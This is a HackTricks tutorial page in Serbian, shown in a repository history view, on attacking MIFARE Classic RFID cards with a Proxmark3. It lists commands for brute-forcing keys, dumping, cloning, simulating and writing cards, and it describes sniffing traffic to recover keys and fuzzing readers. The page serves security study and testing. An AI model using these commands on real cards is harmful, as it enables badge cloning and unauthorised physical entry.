hacktricks/todo/radio-hacking/proxmark-3.md

53 lines
3.2 KiB
Markdown
Raw Normal View History

# Napad na RFID sisteme sa Proxmark3
2022-12-24 11:52:08 +00:00
Prva stvar koju trebate uraditi je da imate [**Proxmark3**](https://proxmark.com) i [**instalirate softver i njegove zavisnosti**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux).
2022-12-24 11:52:08 +00:00
2024-02-10 13:11:20 +00:00
### Napad na MIFARE Classic 1KB
2022-12-24 11:52:08 +00:00
Ima **16 sektora**, svaki od njih ima **4 bloka** i svaki blok sadrži **16B**. UID se nalazi u sektoru 0 bloku 0 (i ne može se promeniti).\
Da biste pristupili svakom sektoru, potrebne su vam **2 ključa** (**A** i **B**) koji se čuvaju u **bloku 3 svakog sektora** (sektorski blok). Sektor blok takođe čuva **pristupne bitove** koji daju dozvole za **čitanje i pisanje** na **svakom bloku** koristeći 2 ključa.\
2024-02-10 13:11:20 +00:00
2 ključa su korisna za davanje dozvola za čitanje ako znate prvi ključ i pisanje ako znate drugi ključ (na primer).
2022-12-24 11:52:08 +00:00
2024-02-10 13:11:20 +00:00
Mogu se izvesti nekoliko napada
2022-12-24 11:52:08 +00:00
```bash
proxmark3> hf mf #List attacks
proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF
proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key
proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory
proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
```
Proxmark3 omogućava obavljanje drugih radnji poput **prisluškivanja** komunikacije **Tag to Reader** kako bi se pokušalo pronaći osetljive podatke. Na ovom uređaju možete samo špijunirati komunikaciju i izračunati korišćeni ključ jer su **kriptografske operacije koje se koriste slabe** i znajući običan i šifrovan tekst možete ga izračunati (`mfkey64` alat).
2022-12-24 11:52:08 +00:00
2024-02-10 13:11:20 +00:00
### Sirove Komande
2022-12-24 11:52:08 +00:00
IoT sistemi ponekad koriste **nebrendirane ili nekomercijalne oznake**. U tom slučaju, možete koristiti Proxmark3 da pošaljete prilagođene **sirove komande oznakama**.
2022-12-24 11:52:08 +00:00
```bash
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
2024-02-10 13:11:20 +00:00
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
2022-12-24 11:52:08 +00:00
```
Sa ovim informacijama možete pokušati da pronađete informacije o kartici i načinu komunikacije s njom. Proxmark3 omogućava slanje sirovih komandi poput: `hf 14a raw -p -b 7 26`
2022-12-24 11:52:08 +00:00
2024-02-10 13:11:20 +00:00
### Skripte
2022-12-24 11:52:08 +00:00
Proxmark3 softver dolazi sa prednapunjenim listom **automatizovanih skripti** koje možete koristiti za obavljanje jednostavnih zadataka. Da biste dobili punu listu, koristite komandu `script list`. Zatim koristite komandu `script run`, praćenu imenom skripte:
2022-12-24 11:52:08 +00:00
```
proxmark3> script run mfkeys
```
Možete kreirati skriptu za **fuzziranje čitača oznaka**, tako što ćete kopirati podatke sa **validne kartice** i napisati **Lua skript** koji **randomizuje** jedan ili više **slučajnih bajtova** i proverava da li **čitač reaguje** sa bilo kojom iteracijom.